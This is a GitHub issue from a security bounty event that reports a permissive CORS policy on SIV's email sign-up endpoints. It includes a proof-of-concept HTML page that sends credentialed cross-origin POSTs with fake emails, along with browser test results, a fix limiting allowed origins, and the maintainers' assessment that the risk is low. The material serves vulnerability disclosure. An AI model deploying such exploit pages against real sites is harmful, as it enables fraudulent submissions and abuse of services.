Unrestricted CORS Policy Vulnerability

[cjackett]

Issue Description

Note: This is a rewrite of the original issue, separating concerns related to CORS and a potential DoS attack vector, now located at https://github.com/siv-org/siv/issues/205.

The current CORS implementation in the following API endpoints allows requests from any origin by setting Access-Control-Allow-Origin: *. This overly permissive CORS policy introduces a security vulnerability by permitting potentially unauthorized cross-origin requests, which could lead to data misuse or unauthorized actions. The affected endpoints are:

• /api/email-signup
• /api/hack-siv/register
• /api/ukraine-updates-subscribe

Exploitation Attempt

An exploit page was created to demonstrate how an attacker might abuse this vulnerability. The page attempts to send unauthorized POST requests to the vulnerable endpoints, potentially submitting fraudulent data or triggering unauthorized actions:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CORS Exploit</title>
</head>
<body>
    <h1>Exploiting Unrestricted CORS Policy</h1>
    <p id="info">Attempting to exploit vulnerable endpoints...</p>

    <script>
        // List of endpoints using unrestricted CORS
        const vulnerableEndpoints = [
            {
                url: "http://localhost:3000/api/email-signup",
                payload: { email: "exploit@example.com" }
            },
            {
                url: "http://localhost:3000/api/hack-siv/register",
                payload: { email: "exploit-hack@example.com" }
            },
            {
                url: "http://localhost:3000/api/ukraine-updates-subscribe",
                payload: { email: "exploit-ukraine@example.com" }
            }
        ];

        // Function to submit malicious requests
        vulnerableEndpoints.forEach(endpoint => {
            fetch(endpoint.url, {
                method: 'POST',
                credentials: 'include', // Ensures cookies are sent with the request
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(endpoint.payload)
            })
            .then(response => response.json())
            .then(data => {
                document.getElementById("info").innerHTML += `<h2>Response from ${endpoint.url}:</h2><pre>${JSON.stringify(data, null, 2)}</pre>`;
            })
            .catch(error => {
                document.getElementById("info").innerHTML += `<p>Failed to exploit ${endpoint.url}: ${error}</p>`;
            });
        });
    </script>
</body>
</html>

Testing Results

When the exploit page was run locally, the browser blocked the cross-origin requests due to the following reasons:

• CORS Policy with Credentials: The CORS policy does not support sending credentials (credentials: 'include') when the Access-Control-Allow-Origin header is set to *. This led to the error:

  Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at ‘http://localhost:3000/api/email-signup’. (Reason: Credential is not supported if the CORS header ‘Access-Control-Allow-Origin’ is ‘*’).

Despite these errors, the exploit could potentially succeed if the page is hosted on a different domain rather than localhost. In a real-world scenario, an attacker could upload this exploit page to a publicly accessible domain and run it against the SIV system to perform unauthorized actions.

Mitigation

To mitigate this risk, modify the CORS implementation to only allow requests from the trusted origin https://siv.org. This can be done by dynamically setting the Access-Control-Allow-Origin header based on the request's origin:

const allowedOrigins = ['https://siv.org'];
const origin = req.headers.origin;
if (origin && allowedOrigins.includes(origin)) {
  res.setHeader('Access-Control-Allow-Origin', origin);
}

This approach will ensure that only requests originating from trusted domains can access the API, thereby reducing the risk of unauthorized access.

It is important to note that the scope of this attack is limited to the three email registration pages mentioned above, which reduces the potential impact. However, addressing this vulnerability is still crucial to prevent any possible misuse or unauthorized data submissions.

[arianabuilds]

Entry Summary for HACK SIV @ DEF CON 2024

Thanks again for participating! This submission earned $22.68 from SIV and $88.57 from the Public Vote, for a total of $111.25.

Here's what we noted in our evaluation:

What's interesting about this submission

• It doesn't need to be * wildcard, it could just be the specific other domains we want to allow

What takes away from it

• All the identified endpoints were intentionally given more permissive CORS headers, to enable cross domain submission
• These endpoints are just for sign ups, with no credential requirements.
• CORS is enforced client-side, bypassable anyway

Issue to track getting paid: https://github.com/siv-org/hack.siv.org/issues/10